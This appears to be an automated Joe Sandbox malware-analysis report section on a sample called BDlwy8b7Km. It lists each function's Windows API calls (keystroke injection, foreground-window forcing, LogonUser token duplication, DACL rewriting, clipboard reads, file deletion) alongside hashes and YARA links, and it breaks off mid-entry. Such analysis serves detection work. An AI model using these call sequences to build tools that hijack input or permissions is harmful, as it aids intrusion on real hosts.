                                                  • Instruction Fuzzy Hash: CF428E34604A11AFEB24CF24DC44EAABBE6FF8A320F144619F699873A1D771D851CF61
                                                  Function 00624873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 006248F3
                                                  • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00624908
                                                  • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00624927
                                                  • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0062494B
                                                  • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0062495C
                                                  • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0062497B
                                                  • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 006249AE
                                                  • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 006249D4
                                                  • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00624A0F
                                                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00624A56
                                                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00624A7E
                                                  • IsMenu.USER32(?), ref: 00624A97
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00624AF2
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00624B20
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00624B94
                                                  • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00624BE3
                                                  • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00624C82
                                                  • wsprintfW.USER32 ref: 00624CAE
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00624CC9
                                                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00624CF1
                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00624D13
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00624D33
                                                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00624D5A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                  • String ID: %d/%02d/%02d
                                                  • API String ID: 4054740463-328681919
                                                  • Opcode ID: e119281c4b11cafc1562a1f078f4b3d71c06cd6c11fa22c7d71fc3480558cd2a
                                                  • Instruction ID: 4c8f9ca53a798b07b79f2ed4195dbcf1fda714f0abdc2bfeaecefbac6d067269
                                                  • Opcode Fuzzy Hash: e119281c4b11cafc1562a1f078f4b3d71c06cd6c11fa22c7d71fc3480558cd2a
                                                  • Instruction Fuzzy Hash: 6D12E071600A25ABEB248F28EC49FEE7BFAEF85710F104119F915EA2E1DB749941CF50
                                                  Function 005AF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 005AF998
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005EF474
                                                  • IsIconic.USER32(00000000), ref: 005EF47D
                                                  • ShowWindow.USER32(00000000,00000009), ref: 005EF48A
                                                  • SetForegroundWindow.USER32(00000000), ref: 005EF494
                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005EF4AA
                                                  • GetCurrentThreadId.KERNEL32 ref: 005EF4B1
                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005EF4BD
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 005EF4CE
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 005EF4D6
                                                  • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 005EF4DE
                                                  • SetForegroundWindow.USER32(00000000), ref: 005EF4E1
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 005EF4F6
                                                  • keybd_event.USER32(00000012,00000000), ref: 005EF501
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 005EF50B
                                                  • keybd_event.USER32(00000012,00000000), ref: 005EF510
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 005EF519
                                                  • keybd_event.USER32(00000012,00000000), ref: 005EF51E
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 005EF528
                                                  • keybd_event.USER32(00000012,00000000), ref: 005EF52D
                                                  • SetForegroundWindow.USER32(00000000), ref: 005EF530
                                                  • AttachThreadInput.USER32(?,000000FF,00000000), ref: 005EF557
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 4125248594-2988720461
                                                  • Opcode ID: fd5ba2bebea762c3f4d86456a47c59d7b8ff65e5b97313f00ad1f60def4840e9
                                                  • Instruction ID: 7e176e686932df340bd1b0cf30c3372f2c7836312f5c479ce812cc13b8b40cdc
                                                  • Opcode Fuzzy Hash: fd5ba2bebea762c3f4d86456a47c59d7b8ff65e5b97313f00ad1f60def4840e9
                                                  • Instruction Fuzzy Hash: 9C318771A402187BEB306BB65C49FBF7E6DFB44B60F101026F601F61D1CAB09D11ABA0
                                                  Function 005F1201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005F16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005F170D
                                                    • Part of subcall function 005F16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005F173A
                                                    • Part of subcall function 005F16C3: GetLastError.KERNEL32 ref: 005F174A
                                                  • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 005F1286
                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 005F12A8
                                                  • CloseHandle.KERNEL32(?), ref: 005F12B9
                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005F12D1
                                                  • GetProcessWindowStation.USER32 ref: 005F12EA
                                                  • SetProcessWindowStation.USER32(00000000), ref: 005F12F4
                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 005F1310
                                                    • Part of subcall function 005F10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005F11FC), ref: 005F10D4
                                                    • Part of subcall function 005F10BF: CloseHandle.KERNEL32(?,?,005F11FC), ref: 005F10E9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                  • String ID: $default$winsta0$Ze
                                                  • API String ID: 22674027-3457319499
                                                  • Opcode ID: abee890258dcb9259444fad2586cac4d783d72bb70d576580659cc1ab17244b1
                                                  • Instruction ID: 9d7326887cd4508c96e3c74a2769f4a01b3a729e8f34c469a8e79adb17ca7059
                                                  • Opcode Fuzzy Hash: abee890258dcb9259444fad2586cac4d783d72bb70d576580659cc1ab17244b1
                                                  • Instruction Fuzzy Hash: 00818671900A09EBDF249FA4DC49BFE7FBABF84710F144129FA11A61A0D7398945CB68
                                                  Function 005F0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005F10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 005F1114
                                                    • Part of subcall function 005F10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1120
                                                    • Part of subcall function 005F10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F112F
                                                    • Part of subcall function 005F10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1136
                                                    • Part of subcall function 005F10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 005F114D
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 005F0BCC
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005F0C00
                                                  • GetLengthSid.ADVAPI32(?), ref: 005F0C17
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 005F0C51
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005F0C6D
                                                  • GetLengthSid.ADVAPI32(?), ref: 005F0C84
                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 005F0C8C
                                                  • HeapAlloc.KERNEL32(00000000), ref: 005F0C93
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 005F0CB4
                                                  • CopySid.ADVAPI32(00000000), ref: 005F0CBB
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 005F0CEA
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005F0D0C
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 005F0D1E
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0D45
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0D4C
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0D55
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0D5C
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0D65
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0D6C
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 005F0D78
                                                  • HeapFree.KERNEL32(00000000), ref: 005F0D7F
                                                    • Part of subcall function 005F1193: GetProcessHeap.KERNEL32(00000008,005F0BB1,?,00000000,?,005F0BB1,?), ref: 005F11A1
                                                    • Part of subcall function 005F1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,005F0BB1,?), ref: 005F11A8
                                                    • Part of subcall function 005F1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,005F0BB1,?), ref: 005F11B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                  • String ID:
                                                  • API String ID: 4175595110-0
                                                  • Opcode ID: a23879df0e7f541eb6dbe8f335cd6de73215ae5071fe3524f19e587788298041
                                                  • Instruction ID: eb1c66c1da03a7ceaa74505678a2e59882d807285b4fa9b7bcde51980f4b9b74
                                                  • Opcode Fuzzy Hash: a23879df0e7f541eb6dbe8f335cd6de73215ae5071fe3524f19e587788298041
                                                  • Instruction Fuzzy Hash: F3716B7290020AABDF20DFA4DC49FBEBBBDBF04310F085515EA14E7192D775A906CBA0
                                                  Function 0060EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenClipboard.USER32(0062CC08), ref: 0060EB29
                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0060EB37
                                                  • GetClipboardData.USER32(0000000D), ref: 0060EB43
                                                  • CloseClipboard.USER32 ref: 0060EB4F
                                                  • GlobalLock.KERNEL32(00000000), ref: 0060EB87
                                                  • CloseClipboard.USER32 ref: 0060EB91
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0060EBBC
                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0060EBC9
                                                  • GetClipboardData.USER32(00000001), ref: 0060EBD1
                                                  • GlobalLock.KERNEL32(00000000), ref: 0060EBE2
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0060EC22
                                                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 0060EC38
                                                  • GetClipboardData.USER32(0000000F), ref: 0060EC44
                                                  • GlobalLock.KERNEL32(00000000), ref: 0060EC55
                                                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0060EC77
                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0060EC94
                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0060ECD2
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0060ECF3
                                                  • CountClipboardFormats.USER32 ref: 0060ED14
                                                  • CloseClipboard.USER32 ref: 0060ED59
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                  • String ID:
                                                  • API String ID: 420908878-0
                                                  • Opcode ID: e58d5f782524beeeca97ec3ed1f636aefddcb609455c10cdbc475f3ec6983096
                                                  • Instruction ID: 5a52b03ab511de4f3512a2bd327b5ba4ea709582395a641f7baa2a6bd46a25c8
                                                  • Opcode Fuzzy Hash: e58d5f782524beeeca97ec3ed1f636aefddcb609455c10cdbc475f3ec6983096
                                                  • Instruction Fuzzy Hash: FA61DE34244202AFD714EF24D898F6A7BA6FF84714F14591DF456872E1CB32ED06CBA2
                                                  Function 0060698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 006069BE
                                                  • FindClose.KERNEL32(00000000), ref: 00606A12
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00606A4E
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00606A75
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00606AB2
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00606ADF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                  • API String ID: 3830820486-3289030164
                                                  • Opcode ID: 2b15bac0128faefd7fc495f59f6312c3ede7dee2cd848afa52026a40fcbbb9ca
                                                  • Instruction ID: 23a36d9fd439edf4489d7e9f75454ba6a6930475e9f696568a7f11964cae20c1
                                                  • Opcode Fuzzy Hash: 2b15bac0128faefd7fc495f59f6312c3ede7dee2cd848afa52026a40fcbbb9ca
                                                  • Instruction Fuzzy Hash: 9ED14E72508305AEC714EBA4C885EAFBBEDBF88704F44491DF585C7291EB74DA48CB62
                                                  Function 00609642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00609663
                                                  • GetFileAttributesW.KERNEL32(?), ref: 006096A1
                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 006096BB
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 006096D3
                                                  • FindClose.KERNEL32(00000000), ref: 006096DE
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 006096FA
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0060974A
                                                  • SetCurrentDirectoryW.KERNEL32(00656B7C), ref: 00609768
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00609772
                                                  • FindClose.KERNEL32(00000000), ref: 0060977F
                                                  • FindClose.KERNEL32(00000000), ref: 0060978F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                  • String ID: *.*
                                                  • API String ID: 1409584000-438819550
                                                  • Opcode ID: 522375c94ae70aadf325239d69da4b6b3e8e518cd4f803b46fc916a42fe80353
                                                  • Instruction ID: 27ed4b2cdc559d6d69a8a0cea9d01625b16a3c12ec2cd28770471eed0b4aca9b
                                                  • Opcode Fuzzy Hash: 522375c94ae70aadf325239d69da4b6b3e8e518cd4f803b46fc916a42fe80353
                                                  • Instruction Fuzzy Hash: 4831E232581619AEDF28EFB4DC09ADF77AFAF49320F104155F904E21E1EB30DA45CA60
                                                  Function 0060979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 006097BE
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00609819
                                                  • FindClose.KERNEL32(00000000), ref: 00609824
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00609840
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00609890
                                                  • SetCurrentDirectoryW.KERNEL32(00656B7C), ref: 006098AE
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 006098B8
                                                  • FindClose.KERNEL32(00000000), ref: 006098C5
                                                  • FindClose.KERNEL32(00000000), ref: 006098D5
                                                    • Part of subcall function 005FDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005FDB00
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                  • String ID: *.*
                                                  • API String ID: 2640511053-438819550
                                                  • Opcode ID: c0c2b8ea5262508032d78b800f840257098a4dc81360d251020136c26f3a0efa
                                                  • Instruction ID: d4c3333a13e09921a107ff0e8741e085614e94614e3174f1c31a148653526b68
                                                  • Opcode Fuzzy Hash: c0c2b8ea5262508032d78b800f840257098a4dc81360d251020136c26f3a0efa
                                                  • Instruction Fuzzy Hash: 8E31C5315816196EDB28EFB4EC48ADF77AFAF46330F108955F910A22D1DB30DA45CA74
                                                  Function 00608195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00608257
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00608267
                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00608273
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00608310
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00608324
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00608356
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0060838C
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00608395
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectoryTime$File$Local$System
                                                  • String ID: *.*
                                                  • API String ID: 1464919966-438819550
                                                  • Opcode ID: 80da86d6ee4fd43dd4509d7a4b57e1941f139a1d73b91ab1cb58c87ba2750c93
                                                  • Instruction ID: a4a00846a850a9a30600a08842a45cfdc66ebf14415d732849de224d6c5ab837
                                                  • Opcode Fuzzy Hash: 80da86d6ee4fd43dd4509d7a4b57e1941f139a1d73b91ab1cb58c87ba2750c93
                                                  • Instruction Fuzzy Hash: 896158725087069FDB14EF60C8449AFB7E9FF89310F04492EF98987291EB31E905CB92
                                                  Function 005FD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00593AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00593A97,?,?,00592E7F,?,?,?,00000000), ref: 00593AC2
                                                    • Part of subcall function 005FE199: GetFileAttributesW.KERNEL32(?,005FCF95), ref: 005FE19A
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 005FD122
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 005FD1DD
                                                  • MoveFileW.KERNEL32(?,?), ref: 005FD1F0
                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 005FD20D
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 005FD237
                                                    • Part of subcall function 005FD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,005FD21C,?,?), ref: 005FD2B2
                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 005FD253
                                                  • FindClose.KERNEL32(00000000), ref: 005FD264
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
